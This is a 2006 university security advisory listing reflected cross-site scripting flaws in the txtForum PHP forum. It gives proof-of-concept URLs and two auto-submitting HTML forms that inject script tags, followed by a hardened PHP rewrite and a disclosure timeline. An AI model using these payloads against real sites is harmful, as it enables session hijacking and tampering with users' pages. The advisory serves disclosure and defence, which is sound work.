txtForum (http://sourceforge.net/projects/txtforum1)
Versions 1.0.4-dev and prior.

There are multiple cross-site scripting (XSS) vulnerabilities, which can be verified with the
following proof-of-concept requests (the user needs to be logged in). They are roughly sorted by
entry point (i.e., the file in which the affected output is located). The vulnerabilities were
discovered under the assumption that register_globals is on and that magic_quotes_gpc is off.
skins/txtforum/under_topic.tpl, line 11
(included by index.php on line 99)

  $prev: not initialized if the file "data/headers.txt" does not exist;
         exploit in this case: analogous to line 123 (see below)
  122: $next: not initialized if the file "data/headers.txt" does not exist;
         exploit in this case: analogous to line 123 (see below)
  123: $rand5: is never initialized
  http://localhost/txtforum104/index.php?rand5="><script>alert('xss_string')</script>
skins/txtforum/topic_form.tpl, line 17
  http://localhost/txtforum104/new_topic.php?r_username='><script>alert('xss_string')</script>

skins/txtforum/topic_form.tpl, line 18
  http://localhost/txtforum104/new_topic.php?r_loc='><script>alert('xss_string')</script>

skins/txtforum/editprofile.tpl, line 22
  http://localhost/txtforum104/profile.php?mode=editprofile&r_icq="><script>alert('xss_string')</script>

skins/txtforum/editprofile.tpl, line 27
  http://localhost/txtforum104/profile.php?mode=editprofile&r_yahoo="><script>alert('xss_string')</script>

skins/txtforum/editprofile.tpl, line 31
  http://localhost/txtforum104/profile.php?mode=editprofile&r_aim="><script>alert('xss_string')</script>

skins/txtforum/editprofile.tpl, line 35

skins/txtforum/editprofile.tpl, line 65
  $selected1: works if the user has set $r_hide_email == 0;
  else: use vulnerability below ($selected0)
  http://localhost/txtforum104/profile.php?mode=editprofile&selected1="><script>alert('xss_string')</script>

skins/txtforum/editprofile.tpl, line 65
  $selected0: works if the user has set $r_hide_email == 1
  http://localhost/txtforum104/profile.php?mode=editprofile&selected0="><script>alert('xss_string')</script>

skins/txtforum/editprofile.tpl, line 69
  $signature_selected1: works if the user has set $show_sig == 0;
  else: use vulnerability below ($signature_selected0)
skins/txtforum/reply_form.tpl, line 31
  http://localhost/txtforum104/reply.php?quote=</textarea><script>alert('xss_string')</script>

skins/txtforum/reply_form.tpl, line 43
  http://localhost/txtforum104/reply.php?tid="><script>alert('xss_string')</script>

skins/txtforum/next_preview.tpl, line 6
  http://localhost/txtforum104/view_topic.php?page=27&tid='><script>alert('xss_string')</script>

view_topic.php, line 12
  $tid is echoed at several places:
  http://localhost/txtforum104/view_topic.php?print_adminJS=1&tid="><script>alert('xss_string')</script>
common.php, line 15
  parameter of admin_msg is echoed;

  <form action='http://localhost/txtforum104/view_topic.php?sticked=<script>alert("xss_string")</script>'
        method="post">
    <input type="text" name="where" value="sticky"/>
    <input type="submit">
  </form>
  <script type="text/javascript">
    document.forms[0].submit();
  </script>

  <form action='http://localhost/txtforum104/view_topic.php' method="post">
    <input type="text" name="where" value="deleteme"/>
    <input type="text" name="mid" value="<script>alert('xss_string')</script>"/>
    <input type="submit">
  </form>
  <script type="text/javascript">
    document.forms[0].submit();
  </script>
view_topic.php, line 244
  $next, via $tid:
  http://localhost/txtforum104/view_topic.php?page=-1&tid=xss_string

view_topic.php, line 271
  http://localhost/txtforum104/view_topic.php?tid=xss_string

view_topic.php, line 272
  $tid: as before

view_topic.php, line 280
  $tid: as before
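The findings above share two root causes: template variables that the application never
initializes (and which therefore, with register_globals on, are taken straight from the
request), and request parameters such as $tid that are echoed into HTML without escaping.
The following PHP is an added illustration and is not part of this advisory or of txtForum's
code; it contrasts the vulnerable pattern with a hardened rendering of the same link. The
variable names $rand5 and $tid are borrowed from the findings, every function name is
hypothetical, and PHP 7.1 or later is assumed.

```php
<?php
// Added illustration, not txtForum code: the two defect classes in this advisory
// (uninitialized template variables under register_globals, and unescaped output)
// next to a hardened rendering of the same link. $rand5 and $tid are borrowed from
// the findings; every function name here is hypothetical. PHP >= 7.1 assumed.

// --- Vulnerable pattern -------------------------------------------------------
// With register_globals=On every request parameter becomes a PHP global. A template
// that echoes a variable the application never assigned is therefore echoing request
// input, and without escaping the characters "> close the attribute and let a
// <script> element through.
function render_link_vulnerable(): string
{
    global $rand5;                       // never assigned by the application
    return "<a href=\"index.php?rand5=$rand5\">next</a>";
}

// --- Hardened pattern ---------------------------------------------------------
// 1. Take input from an explicit array instead of relying on globals, and give every
//    template variable a default so it can never be "uninitialized".
// 2. Encode for the context: rawurlencode() for the query string, then
//    htmlspecialchars() with ENT_QUOTES for the attribute (both " and ' are escaped,
//    which matters because the templates above use both quote styles).
// 3. Validate identifiers such as $tid as integers; a topic id carries no markup.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_link_hardened(array $request): string
{
    $rand5 = isset($request['rand5']) ? (string) $request['rand5'] : '';
    $href  = 'index.php?rand5=' . rawurlencode($rand5);
    return '<a href="' . esc($href) . '">next</a>';
}

function topic_id(array $request): int
{
    // FILTER_VALIDATE_INT rejects '7"><script>' outright rather than silently
    // truncating it to 7 the way (int) would; 0 means "no valid topic id".
    $tid = filter_var($request['tid'] ?? '', FILTER_VALIDATE_INT,
                      ['options' => ['min_range' => 1]]);
    return $tid === false ? 0 : $tid;
}

// Demonstration on a constructed request modelled on the advisory's PoC strings.
$request = ['rand5' => '"><script>alert(1)</script>', 'tid' => '7"><script>'];

$rand5 = $request['rand5'];                 // what register_globals would have done
echo render_link_vulnerable(), "\n";        // payload reaches the page unescaped
echo render_link_hardened($request), "\n";  // payload is percent-encoded, attribute stays closed
echo topic_id($request), "\n";              // malformed id is rejected
echo topic_id(['tid' => '42']), "\n";       // well-formed id passes through
```

Running the script with php on the command line shows the difference directly: the first
link still contains a live script element, the second contains only percent-encoded
characters inside a properly quoted attribute, and the malformed topic id is rejected
instead of being reflected.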
There is no solution to these issues yet.

Timeline:

  February 23, 2006: Vulnerabilities reported to the author via
                     confy at users dot sourceforge dot net.
                     Provided detailed report of the vulnerabilities after the author's response.
                     No fixes are planned.
  March 9, 2006:     Advisory submission.

http://www.seclab.tuwien.ac.at/advisories/TUVSA-0603-003.txt

Nenad Jovanovic
Secure Systems Lab
Technical University of Vienna
www.seclab.tuwien.ac.at